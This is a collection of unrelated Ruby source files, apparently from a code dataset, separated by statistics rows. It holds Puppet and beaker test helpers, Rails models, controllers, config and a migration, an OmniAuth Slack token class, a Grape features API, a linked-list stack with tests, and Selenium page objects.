it 'does not allow non-boolean values' do
expect do
described_class.new(:name => 'foo', param => 'unknown')
end.to raise_error Puppet::ResourceError, %r{Invalid value "unknown". Valid values are true, false.}
end
it_behaves_like 'validated property', param, default, [true, false, 'true', 'false', :true, :false]
end
shared_examples 'readonly property' do |param|
it 'is readonly' do
expect do
described_class.new(:name => 'foo', param => 'invalid')
end.to raise_error(Puppet::Error, %r{#{param} is read-only})
end
end
| 28.02963 | 104 | 0.667548 |
6115a1bcc62ced5d0196cfb00803a7a341c07c2f | 119 | class Email
include Mongoid::Document
field :address
validates_uniqueness_of :address
embedded_in :patient
end
| 17 | 34 | 0.798319 |
2833fd1be0f0ff00f33b31d9cc5ede05afd1a992 | 287 | class StaticPagesController < ApplicationController
def home
if logged_in?
@micropost = current_user.microposts.build
@feed_items = current_user.feed.paginate(page: params[:page])
end
end
def help
end
def about
end
def contact
end
end
| 13.666667 | 67 | 0.66899 |
1d726c9a1e700fc5f507592ae3ec463390d50b89 | 109 | # frozen_string_literal: true
Ralyxa::Skill.intent 'AMAZON.NextIntent' do
# TODO: respond('TBD Next')
end
| 18.166667 | 43 | 0.743119 |
01f76ef7fbbbb7460ac8d013dbe12714e8bfed6e | 280 | module Cucumber
module Ast
class Visitor
DEPRECATION_WARNING = "Cucumber::Ast::Visitor is deprecated and will be removed. You no longer need to inherit from this class."
def initialize(step_mother)
raise(DEPRECATION_WARNING)
end
end
end
end
| 23.333333 | 134 | 0.703571 |
e9a765bfc7671cdc205048773d65b43a3d90e2ad | 1,784 | require 'puppet'
require 'beaker-rspec/spec_helper'
require 'beaker-rspec/helpers/serverspec'
# overriding puppet installation for the RedHat family distros due to
# puppet breakage >= 3.5
def install_puppet(host)
host['platform'] =~ /(fedora|el)-(\d+)/
if host['platform'] =~ /(fedora|el)-(\d+)/
safeversion = '3.4.2'
platform = $1
relver = $2
on host, "rpm -ivh http://yum.puppetlabs.com/puppetlabs-release-#{platform}-#{relver}.noarch.rpm"
on host, "yum install -y puppet-#{safeversion}"
else
super()
end
end
RSpec.configure do |c|
# Project root
proj_root = File.expand_path(File.join(File.dirname(__FILE__), '..'))
c.before(:each) do
Puppet::Util::Log.level = :warning
Puppet::Util::Log.newdestination(:console)
end
c.before :suite do
hosts.each do |host|
unless (ENV['RS_PROVISION'] == 'no' || ENV['BEAKER_provision'] == 'no')
begin
on host, 'puppet --version'
rescue
if host.is_pe?
install_pe
else
install_puppet(host)
end
end
end
# Install module and dependencies
puppet_module_install(:source => proj_root, :module_name => File.basename(proj_root).gsub(/^puppet-/,''))
on host, puppet('module', 'install', 'puppetlabs-stdlib', '--version=3.2.0'), { :acceptable_exit_codes => [0,1] }
on host, puppet('module', 'install', 'puppetlabs-java', '--version=1.2.0'), { :acceptable_exit_codes => [0,1] }
on host, puppet('module', 'install', 'puppetlabs-wget', '--version=1.0.0'), { :acceptable_exit_codes => [0,1] }
on host, puppet('module', 'install', 'stahnma-epel', '--version=0.1.0'), { :acceptable_exit_codes => [0,1] } if fact_on(host,'osfamily') == 'RedHat'
end
end
end
| 32.436364 | 154 | 0.619395 |
87574dc3c63c0a9e8055d794a76fdffcc391d0d6 | 2,319 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
config.webpacker.check_yarn_integrity = false
config.hosts << 'skimo-pl'
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
# Run rails dev:cache to toggle caching.
if Rails.root.join('tmp', 'caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.action_controller.enable_fragment_cache_logging = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => "public, max-age=#{2.days.to_i}"
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
# Store uploaded files on the local file system (see config/storage.yml for options).
config.active_storage.service = :local
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Highlight code that triggered database queries in logs.
config.active_record.verbose_query_logs = true
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations.
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
end
| 36.234375 | 87 | 0.763691 |
91e80e9f6dbf49c67c2d00841d3acf7043dd2095 | 301 | class TwsGecko::ServerDatabaseError < StandardError
attr_reader :raw
def initialize(raw)
@raw = raw
super "No response from database of server"
end
end
class TwsGecko::ServerNoResponseError < StandardError
def initialize(raw = nil)
@raw = raw
super "#{@raw['stat']}"
end
end | 21.5 | 53 | 0.704319 |
01564024c6bba66b837aaa661470e8bad77d9012 | 2,156 | #
# Author:: Doug MacEachern <[email protected]>
# Cookbook:: windows
# Provider:: shortcut
#
# Copyright:: 2010-2016, VMware, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
use_inline_resources
def load_current_resource
require 'win32ole'
@link = WIN32OLE.new('WScript.Shell').CreateShortcut(@new_resource.name)
@current_resource = Chef::Resource::WindowsShortcut.new(@new_resource.name)
@current_resource.name(@new_resource.name)
@current_resource.target(@link.TargetPath)
@current_resource.arguments(@link.Arguments)
@current_resource.description(@link.Description)
@current_resource.cwd(@link.WorkingDirectory)
@current_resource.iconlocation(@link.IconLocation)
end
# Check to see if the shorcut needs any changes
#
# === Returns
# <true>:: If a change is required
# <false>:: If the shorcuts are identical
def compare_shortcut
[:target, :arguments, :description, :cwd, :iconlocation].any? do |attr|
!@new_resource.send(attr).nil? && @current_resource.send(attr) != @new_resource.send(attr)
end
end
action :create do
if compare_shortcut
@link.TargetPath = @new_resource.target unless @new_resource.target.nil?
@link.Arguments = @new_resource.arguments unless @new_resource.arguments.nil?
@link.Description = @new_resource.description unless @new_resource.description.nil?
@link.WorkingDirectory = @new_resource.cwd unless @new_resource.cwd.nil?
@link.IconLocation = @new_resource.iconlocation unless @new_resource.iconlocation.nil?
# ignoring: WindowStyle, Hotkey
@link.Save
Chef::Log.info("Added #{@new_resource} shortcut")
new_resource.updated_by_last_action(true)
end
end
| 35.344262 | 94 | 0.756957 |
185098bbb9f9f77b6ebd23d814cdef07fae1caf3 | 1,707 | class ListStack
attr_accessor :head
class ListElement
attr_accessor :value, :next_element
def initialize(value: , next_element: )
self.value = value
self.next_element = next_element
end
end
def push(value)
old_head = self.head
self.head = ListElement.new(value: value, next_element: old_head)
end
# Needs more tests
def each
current_head = head
yield current_head
while current_head.next_element != nil
current_head = current_head.next_element
yield current_head
end
current_head
end
def length
if head
count = 0
self.each do |element|
count += 1
end
count
else
0
end
end
def pop
former_head = self.head
self.head = former_head.next_element
former_head.value
end
end
require 'minitest/autorun'
class TestListStack < Minitest::Test
def stack_class
ListStack
end
def test_pushing_an_item
stack = stack_class.new
stack.push 1
assert_equal(1, stack.length)
end
def test_pushing_and_popping_two_items
stack = stack_class.new
stack.push 1
stack.push 456
assert_equal(2, stack.length)
assert_equal(456, stack.pop)
assert_equal(1, stack.pop)
end
def test_popping_an_item
stack = stack_class.new
stack.push 123
assert_equal(123, stack.pop)
assert_equal(0, stack.length)
end
def test_empty_length
stack = stack_class.new
assert_equal(0, stack.length)
end
def test_each
stack = stack_class.new
stack.push 1
stack.push 456
values = []
stack.each do |element|
values << element.value
end
assert_equal([456, 1], values)
end
end
| 17.597938 | 69 | 0.666667 |
1c99321c58d641eeb04a9f6db0f451fc5da13ce2 | 523 | # Import modules
require './Common.rb'
class ExtractAnnotations
def self.Run()
# Getting instance of the API
$api = GroupDocsAnnotationCloud::AnnotateApi.from_config($config)
file_info = GroupDocsAnnotationCloud::FileInfo.new()
file_info.file_path = "annotationdocs\\input.docx"
$request = GroupDocsAnnotationCloud::ExtractRequest.new(file_info)
# Executing an API.
$response = $api.extract($request)
puts("ExtractAnnotations: annotations count = " + $response.length.to_s)
end
end | 26.15 | 76 | 0.730402 |
619015196f493c5469b7fe30e802c059829111fc | 10,750 | # :markup: tomdoc
require 'oauth2/access_token'
require 'omniauth-slack/refinements'
require 'omniauth-slack/data_methods'
require 'omniauth-slack/debug'
module OmniAuth
module Slack
using StringRefinements
module OAuth2
# Enhanced subclass of OAuth2::AccessToken, used by OmniAuth::Slack
# whenever an OAuth2::AccessToken is required.
#
# Adds class and instance scope-query method +has_scope?+, and adds
# basic API data methods and access methods.
class AccessToken < ::OAuth2::AccessToken
include OmniAuth::Slack::DataMethods
include OmniAuth::Slack::Debug
# AccessToken instance (self), so Strategy data-methods can be copied to AccessToken without modification.
def access_token; self; end
# Creates simple getter methods to pull specific data from params.
%w(user_name user_email team_id team_name team_domain).each do |word|
obj, atrb = word.split('_')
define_method(word) do
params[word] ||
params[obj].to_h[atrb]
end
end
# Cannonical AccessToken user_id.
def user_id
params['user_id'] ||
params['user'].to_h['id'] ||
params['authorizing_user'].to_h['user_id']
end
# Cannonical AccessToken unique user-team-id combo.
def uid
"#{user_id}-#{team_id}"
end
# Is this a workspace app token?
#
# Returns nil if unknown
def is_app_token?
case
when params['token_type'] == 'app' || token.to_s[/^xoxa/]
true
when token.to_s[/^xoxp/]
false
else
nil
end
end
# Is this a token returned from an identity-scoped request?
def is_identity_token?
(params['user_id'] ||
params['user'].to_h['id']) && true || false
end
# Identity scopes (workspace apps only).
# Given _user_id, returns specific identity scopes.
#
# Sets @apps_permissions_users_list with parsed API response.
#
# _user_id - String of Slack user ID.
#
def apps_permissions_users_list(_user_id=nil)
#raise StandardError, "APUL caller #{caller_method_name} user #{_user_id}"
return {} unless is_app_token?
semaphore.synchronize {
@apps_permissions_users_list ||= (
r = get('/api/apps.permissions.users.list').parsed
r['resources'].to_a.inject({}){|h,i| h[i['id']] = i; h} || {}
)
_user_id ? @apps_permissions_users_list[_user_id].to_h['scopes'] : @apps_permissions_users_list
}
end
# Hash of current scopes for this token (workspace apps only).
# Sets +@apps_permissions_scopes_list+ with parsed API response.
def apps_permissions_scopes_list
return {} unless is_app_token?
semaphore.synchronize {
@apps_permissions_scopes_list ||= (
r = get('/api/apps.permissions.scopes.list').parsed
r['scopes'] || {}
)
}
end
# Compiles scopes awarded to this AccessToken.
# Given _user_id, includes +apps.permissions.users.list+.
#
# Sets +@all_scopes+ with parsed API response.
#
# This now puts all compiled scopes back into <tt>params['scopes']</tt>.
#
# _user_id - String of Slack user ID.
#
# Returns Hash of scope Arrays where *key* is scope section
# and *value* is Array of scopes.
#
def all_scopes(_user_id=nil)
debug{"_user_id: #{_user_id}, @all_scopes: #{@all_scopes}"}
if _user_id && !@all_scopes.to_h.has_key?('identity') || @all_scopes.nil?
@all_scopes = (
scopes = case
when params['scope']
{'classic' => params['scope'].words}
when params['scopes']
params['scopes']
when is_app_token?
apps_permissions_scopes_list
end
scopes['identity'] = apps_permissions_users_list(_user_id) if _user_id && is_app_token?
params['scopes'] = scopes
)
else
@all_scopes
end
end
# Match a given set of scopes against this token's awarded scopes,
# classic and workspace token compatible.
#
# If the scope-query is a string, it will be interpreted as a Slack Classic App
# scope string +{classic: scope-query-string}+.
#
# The keywords need to be symbols, so any hash passed as an argument
# (or as the entire set of args) should have symbolized keys!
#
# freeform_array - [*Array, nil] default: [], array of scope query hashes
#
# :query - [Hash, Array, nil] default: nil, a single scope-query Hash (or Array of Hashes)
#
# :logic - [String, Symbol] default: 'or' [:or | :and] logic for the scope-query.
# Applies to a single query hash.
# The reverse logic is applied to an array of query hashes.
#
# :user - [String] (nil) default: nil, user_id of the Slack user to query against
# leave blank for non-user queries
#
# :base - [Hash] default: nil, a set of scopes to query against
# defaults to the awarded scopes on this token
#
# freeform_hash - [**Hash] default: {}, interpreted as single scope query hash
#
# TODO: Does this accept all slack token types? What about bot tokens? Others?
#
def has_scope?(*freeform_array, query: nil, logic:'or', user:nil, base:nil, **freeform_hash)
debug{{freeform_array:freeform_array, freeform_hash:freeform_hash, query:query, logic:logic, user:user, base:base}}
#OmniAuth.logger.debug({freeform_array:freeform_array, freeform_hash:freeform_hash, query:query, logic:logic, user:user, base:base})
query ||= case
when freeform_array.any?; freeform_array
when freeform_hash.any?; freeform_hash
end
return unless query
query = [query].flatten if query.is_a?(Array)
user ||= user_id
debug{"using user '#{user}' and query '#{query}'"}
is_identity_query = case query
when Hash
query.keys.detect{|k| k.to_s == 'identity'}
when Array
query.detect{ |q| q.is_a?(Hash) && q.keys.detect{|k| k.to_s == 'identity'} }
end
base ||= case
when user && is_identity_query
debug{"calling all_scopes(user=#{user}) to build base-scopes"}
all_scopes(user)
else
debug{"calling all_scopes to build base-scopes"}
all_scopes
end
#debug{{freeform_array:freeform_array, freeform_hash:freeform_hash, query:query, logic:logic, user:user, base:base}}
self.class.has_scope?(scope_query:query, scope_base:base, logic:logic)
end
# Matches the given scope_query against the given scope_base, with the given logic.
#
# This is classic and workspace token compatible.
#
# keywords - All arguments are keyword arguments:
#
# :scope_query - [Hash, Array of hashes] default: {}.
# If scope_query is a string, it will be interpreted as +{classic: scope-query-string}+.
#
# key - Symbol of scope type <app_home|team|channel|group|mpim|im|identity|classic>
# value - Array or String of individual scopes
#
# :scope_base - [Hash] defaul: {}, represents the set of scopes to query against.
#
# :logic - [String, Symbol] default: or. One of <and|or>.
# Applies to a single query hash.
# The reverse logic is applied to an array of query hashes.
#
# Examples
#
# has_scope?(scope_query: {channel: 'channels:read chat:write'})
# has_scope?(scope_query: [{identity:'uers:read', channel:'chat:write'}, {app_home:'chat:write'}], logic:'and')
# has_scope?(scope_query: 'identity:users identity:team identity:avatar')
#
# TODO: Remove any code specific to Slack, like classic-vs-workspace handling.
#
# TODO: Can this be added to OAuth2::AccessToken as a generic has_scope? Would it work for other providers?
# It ~should~ work for other providers, according to oauth2 spec https://tools.ietf.org/html/rfc6749#section-3.3
#
def self.has_scope?(scope_query:{}, scope_base:{}, logic:'or')
debug{"class-level-has_scope? scope_query '#{scope_query}' scope_base '#{scope_base}' logic '#{logic}'"}
_scope_query = scope_query.is_a?(String) ? {classic: scope_query} : scope_query
_scope_query = [_scope_query].flatten
_scope_base = scope_base
raise "scope_base must be a hash" unless (_scope_base.is_a?(Hash) || _scope_base.respond_to?(:to_h))
_logic = case
when logic.to_s.downcase == 'or'; {outter: 'all?', inner: 'any?'}
when logic.to_s.downcase == 'and'; {outter: 'any?', inner: 'all?'}
else {outter: 'all?', inner: 'any?'}
end
debug{"logic #{_logic.inspect}"}
_scope_query.send(_logic[:outter]) do |query|
debug{"outter query: #{_scope_query.inspect}"}
query.send(_logic[:inner]) do |section, scopes|
test_scopes = case
when scopes.is_a?(String); scopes.words
when scopes.is_a?(Array); scopes
else raise "Scope data must be a string or array of strings, like this {team: 'chat:write,team:read', channels: ['channels:read', 'chat:write']}"
end
test_scopes.send(_logic[:inner]) do |scope|
debug{"inner query section: #{section.to_s}, scope: #{scope}"}
_scope_base.to_h[section.to_s].to_a.include?(scope.to_s)
end
end
end # scope_query.each
end # self.has_scope?
end # AccessToken
end
end
end | 41.992188 | 161 | 0.560744 |
2688c4ccbad5738dba1d3b4768b30cd08375e872 | 656 | # frozen_string_literal: true
module Sentry
module Gruf
# Current gruf-sentry version
#
# format: 'a.b.c' with possible suffixes such as alpha
# * a is for major version, it is guaranteed to be changed
# if back-compatibility of public API is broken
# * b is for minor version, it is guaranteed to be changed
# on public API changes and also if private API
# back-compatibility is broken
# * c is for incremental version, it is updated in other cases
# According to this, it is enough to specify '~> a.b'
# if private API was not used and to specify '~> a.b.c' if it was
VERSION = "1.1.0"
end
end
| 34.526316 | 69 | 0.670732 |
1cb3966b75724024fa6a63f3105bc86432a0eda3 | 304 | class UpgradeApidaeObjsTitleDataType < ActiveRecord::Migration[5.2]
def change
add_column :apidae_objs, :title_data, :jsonb
Apidae::Obj.all.unscoped.each do |o|
o.update(title_data: {'title' => {'fr' => o.read_attribute(:title)}})
end
remove_column :apidae_objs, :title
end
end
| 30.4 | 75 | 0.697368 |
1aff62b5165797fc509d096d2550c1e031edc8d7 | 1,495 | module SpreePayuGateway
module Generators
class InstallGenerator < Rails::Generators::Base
class_option :auto_run_migrations, type: :boolean, default: false
def self.source_root
@_config_source_root ||= File.expand_path("../", __FILE__)
end
def add_javascripts
append_file 'vendor/assets/javascripts/spree/frontend/all.js', "//= require spree/frontend/spree_payu_bolt_checkout\n"
end
def add_migrations
run 'bundle exec rake railties:install:migrations FROM=spree_payu_gateway'
end
def run_migrations
run_migrations = options[:auto_run_migrations] || ['', 'y', 'Y'].include?(ask('Would you like to run the migrations now? [Y/n]'))
if run_migrations
run 'bundle exec rails db:migrate'
else
puts 'Skipping rails db:migrate, don\'t forget to run it!'
end
end
# def install_config_gem
# run 'bundle exec rails g config:install'
# copy_file 'development.yml', 'config/settings/development.yml', force: true
# copy_file 'production.yml', 'config/settings/production.yml', force: true
# copy_file 'test.yml', 'config/settings/test.yml', force: true
# end
def copy_views
copy_file 'views/_payu_in.html.erb', 'app/views/spree/checkout/payment/_payu_in.html.erb'
copy_file 'views/_admin_payu.html.erb', 'app/views/spree/admin/payments/source_views/_payu_in.html.erb'
end
end
end
end
| 34.767442 | 137 | 0.668227 |
1de3e24fbab55d14d6dc0140d1079abd39748cd9 | 4,419 | # Adding in the require_relative 'logged_in_page' line to ensure that the autoloader does not fail
# with the error "uninitialized constant LoggedInPage (NameError)"
require_relative 'logged_in_page'
require_relative '../page'
require_relative '../project'
require_relative 'select2_module'
class CreateProjectPage < LoggedInPage
include Select2Module
ID_REPO_SELECTOR = 's2id_git_fusion_repo_name'.freeze
ID_SERVER_SELECTOR = 's2id_git_fusion_entry'.freeze
ID_NAMESPACE_SELECTOR = 's2id_project_namespace_id'.freeze
ID_MIRRORORING_DISABLED = 'git_fusion_repo_create_type_disabled'.freeze
ID_MIRRORORING_AUTO_CREATE = 'git_fusion_repo_create_type_auto-create'.freeze
ID_MIRRORORING_IMPORT = 'git_fusion_repo_create_type_import-repo'.freeze
ID_GF_ENTRY = 'git_fusion_entry'.freeze
ID_PROJECT_PATH = 'project_path'.freeze
NAME_COMMIT = 'commit'.freeze
ID_PROJECT_VIS_PRIVATE = 'project_visibility_level_0'.freeze
ID_PROJECT_VIS_INTERNAL = 'project_visibility_level_10'.freeze
ID_PROJECT_VIS_PUBLIC = 'project_visibility_level_20'.freeze
def initialize(driver)
super(driver)
wait_for_gf_options_to_load
verify
end
def elements_for_validation
elems = super
elems << [:id, ID_PROJECT_PATH] # project name
elems << [:name, NAME_COMMIT] # create project button
if servers_exist?
elems << [:id, ID_MIRRORORING_DISABLED] # Not mirrored
elems << [:id, ID_MIRRORORING_AUTO_CREATE] # auto-create mirrored
elems << [:id, ID_MIRRORORING_IMPORT] # mirror existing
elems << [:id, ID_GF_ENTRY] # GF server selection dropdown
end
elems
end
def project_name(name)
field = @driver.find_element(:id, ID_PROJECT_PATH)
field.clear
field.send_keys(name)
end
def namespace(namespace)
select2_select(ID_NAMESPACE_SELECTOR, namespace)
end
def namespaces
select2_options(ID_NAMESPACE_SELECTOR)
end
def selected_namespace
select2_selected(ID_NAMESPACE_SELECTOR)
end
def create_project_and_wait_for_clone
@driver.find_element(:name, NAME_COMMIT).click
ProjectPage.new(@driver)
end
def select_mirrored_none
@driver.find_element(:id, ID_MIRRORORING_DISABLED).click
end
def select_mirrored_auto
@driver.find_element(:id, ID_MIRRORORING_AUTO_CREATE).click
end
def select_mirrored_specific
@driver.find_element(:id, ID_MIRRORORING_IMPORT).click
end
def select_private
@driver.find_element(:id, ID_PROJECT_VIS_PRIVATE).click
end
def select_internal
@driver.find_element(:id, ID_PROJECT_VIS_INTERNAL).click
end
def select_public
@driver.find_element(:id, ID_PROJECT_VIS_PUBLIC).click
end
def repo_names
check_servers_exist
return [] unless repos_exist?
text_values = select2_options(ID_REPO_SELECTOR)
text_values.delete_at(0) if text_values[0] == '<Select repository to enable>'
text_values
end
def selected_repo
check_servers_exist
select2_selected(ID_REPO_SELECTOR)
end
def select_repo(repo)
check_servers_exist
# For PGL-1255
# Need to specifically select mirrored_specific to cater for PGL-1255
# For an unknown reason, the first time you select something using this automation, it doesn't select properly
# which I can't reproduce manually.
# Clicking mirrored_auto then mirrored_specific seems to workaround this issue.
select_mirrored_auto
select_mirrored_specific
# end: For PGL-1255
select2_select(ID_REPO_SELECTOR, repo)
end
def server_names
return [] unless servers_exist?
select2_options(ID_SERVER_SELECTOR)
end
def selected_server
check_servers_exist
select2_selected(ID_SERVER_SELECTOR)
end
def select_server(server)
check_servers_exist
select2_select(ID_SERVER_SELECTOR, server)
wait_for_gf_options_to_load
end
private
def servers_exist?
wait_for(:id, ID_GF_ENTRY)
[email protected]_elements(:id, ID_GF_ENTRY).empty?
end
def check_servers_exist
raise 'No GF servers have been configured, you can\'t interact with them' unless servers_exist?
end
def repos_exist?
wait_for_gf_options_to_load
[email protected]_elements(:id, ID_REPO_SELECTOR).empty?
end
def wait_for_gf_options_to_load
wait_for(:id, ID_MIRRORORING_DISABLED) if servers_exist?
end
end
| 29.264901 | 114 | 0.746549 |
01c3ed699c054c034624e1d569e2a7471e99e6ec | 2,855 | # frozen_string_literal: true
# See LICENSE.txt at root of repository
# GENERATED FILE - DO NOT EDIT!!
require 'ansible/ruby/modules/base'
module Ansible
module Ruby
module Modules
# Manage Self-IPs on a BIG-IP system.
class Bigip_selfip < Base
# @return [String, nil] The IP addresses for the new self IP. This value is ignored upon update as addresses themselves cannot be changed after they are created.,This value is required when creating new self IPs.
attribute :address
validates :address, type: String
# @return [Array<String>, String, nil] Configure port lockdown for the Self IP. By default, the Self IP has a "default deny" policy. This can be changed to allow TCP and UDP ports as well as specific protocols. This list should contain C(protocol):C(port) values.
attribute :allow_service
validates :allow_service, type: TypeGeneric.new(String)
# @return [String] The self IP to create.,If this parameter is not specified, then it will default to the value supplied in the C(address) parameter.
attribute :name
validates :name, presence: true, type: String
# @return [String, nil] The netmask for the self IP. When creating a new Self IP, this value is required.
attribute :netmask
validates :netmask, type: String
# @return [:absent, :present, nil] When C(present), guarantees that the Self-IP exists with the provided attributes.,When C(absent), removes the Self-IP from the system.
attribute :state
validates :state, expression_inclusion: {:in=>[:absent, :present], :message=>"%{value} needs to be :absent, :present"}, allow_nil: true
# @return [Object, nil] The traffic group for the Self IP addresses in an active-active, redundant load balancer configuration. When creating a new Self IP, if this value is not specified, the default of C(/Common/traffic-group-local-only) will be used.
attribute :traffic_group
# @return [String, nil] The VLAN that the new self IPs will be on. When creating a new Self IP, this value is required.
attribute :vlan
validates :vlan, type: String
# @return [Integer, nil] The route domain id of the system. When creating a new Self IP, if this value is not specified, a default value of C(0) will be used.,This value cannot be changed after it is set.
attribute :route_domain
validates :route_domain, type: Integer
# @return [String, nil] Device partition to manage resources on. You can set different partitions for Self IPs, but the address used may not match any other address used by a Self IP. In that sense, Self IPs are not isolated by partitions as other resources on a BIG-IP are.
attribute :partition
validates :partition, type: String
end
end
end
end
| 58.265306 | 282 | 0.705079 |
217459164638068adbf9d6bf166c1793edcffd0e | 1,682 | module API
class Features < Grape::API
before { authenticated_as_admin! }
helpers do
def gate_value(params)
case params[:value]
when 'true'
true
when '0', 'false'
false
else
params[:value].to_i
end
end
def gate_target(params)
if params[:feature_group]
Feature.group(params[:feature_group])
elsif params[:user]
User.find_by_username(params[:user])
else
gate_value(params)
end
end
end
resource :features do
desc 'Get a list of all features' do
success Entities::Feature
end
get do
features = Feature.all
present features, with: Entities::Feature, current_user: current_user
end
desc 'Set the gate value for the given feature' do
success Entities::Feature
end
params do
requires :value, type: String, desc: '`true` or `false` to enable/disable, an integer for percentage of time'
optional :feature_group, type: String, desc: 'A Feature group name'
optional :user, type: String, desc: 'A GitLab username'
mutually_exclusive :feature_group, :user
end
post ':name' do
feature = Feature.get(params[:name])
target = gate_target(params)
value = gate_value(params)
case value
when true
feature.enable(target)
when false
feature.disable(target)
else
feature.enable_percentage_of_time(value)
end
present feature, with: Entities::Feature, current_user: current_user
end
end
end
end
| 25.484848 | 117 | 0.592152 |
bbbaa04be67c66127f05a6de7a3cccc0eb0cdfc1 | 220 | require 'spec_helper'
describe 'nodejs::default' do
# Serverspec examples can be found at
# http://serverspec.org/resource_types.html
it 'does something' do
skip 'Replace this with meaningful tests'
end
end
| 22 | 45 | 0.740909 |
ab766ae77ef5e369cd19bfdcdd5b70ab30291673 | 3,891 | require "active_support/core_ext/integer/time"
Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
# or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
# config.require_master_key = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV["RAILS_SERVE_STATIC_FILES"].present?
# Compress CSS using a preprocessor.
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.asset_host = "http://assets.example.com"
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = "X-Sendfile" # for Apache
# config.action_dispatch.x_sendfile_header = "X-Accel-Redirect" # for NGINX
# Store uploaded files on the local file system (see config/storage.yml for options).
config.active_storage.service = :local
# Mount Action Cable outside main process or domain.
# config.action_cable.mount_path = nil
# config.action_cable.url = "wss://example.com/cable"
# config.action_cable.allowed_request_origins = [ "http://example.com", /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Include generic and useful information about system operation, but avoid logging too much
# information to avoid inadvertent exposure of personally identifiable information (PII).
config.log_level = :info
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment).
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "drkiq_production"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Don't log any deprecations.
config.active_support.report_deprecations = false
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require "syslog/logger"
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new "app-name")
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
end
| 41.393617 | 100 | 0.759188 |
2139315a15e5953ed935f51153809dd730b68de7 | 933 | cask "malus" do
version "1.9.6"
sha256 "5318b05bfead4b3bd08b25772af4c265d850bbd0af7ce2f57e7bb49421980ebe"
url "https://malus.s3cdn.net/uploads/Malus-mac_#{version.no_dots}.dmg",
verified: "malus.s3cdn.net/"
name "Malus"
desc "Proxy to help accessing various online media resources/services"
homepage "https://getmalus.com/"
livecheck do
url "https://api.getmalus.com/api/checkDesktopUpdate?type=mac"
strategy :sparkle, &:short_version
end
auto_updates true
depends_on macos: ">= :sierra"
app "Malus.app"
uninstall rmdir: "/Library/Application Support/Malus"
zap trash: [
"~/Library/Application Support/Malus",
"~/Library/Application Support/com.getmalus.malus",
"~/Library/Logs/com.getmalus.malus",
"~/Library/Caches/com.getmalus.malus",
"~/Library/Preferences/com.getmalus.malus.plist",
"~/Library/Saved Application State/com.getmalus.malus.savedState",
]
end
| 29.15625 | 75 | 0.721329 |
ff181a08ea20760fb6e9bcfc80bed0f25cc0d2a8 | 1,550 | class InitialSchema < ActiveRecord::Migration[5.2]
def change
create_table "customers" do |t|
t.string "first_name", default: "", null: false
t.string "middle_initial", default: "", null: false
t.string "last_name", default: "", null: false
t.string "address1", default: "", null: false
t.string "city", default: "", null: false
t.string "state", default: "", null: false
t.string "zip_code", default: "", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "items" do |t|
t.string "name", default: "", null: false
t.decimal "unit_price", precision: 8, scale: 2, default: "0.0", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "line_items" do |t|
t.datetime "added_at", null: false
t.decimal "price", precision: 8, scale: 2, default: "0.0", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.integer "purchase_order_id"
t.integer "item_id"
t.decimal "quantity", precision: 8, scale: 2
t.decimal "unit_price", precision: 8, scale: 2, default: "0.0"
end
create_table "purchase_orders" do |t|
t.string "title"
t.datetime "date"
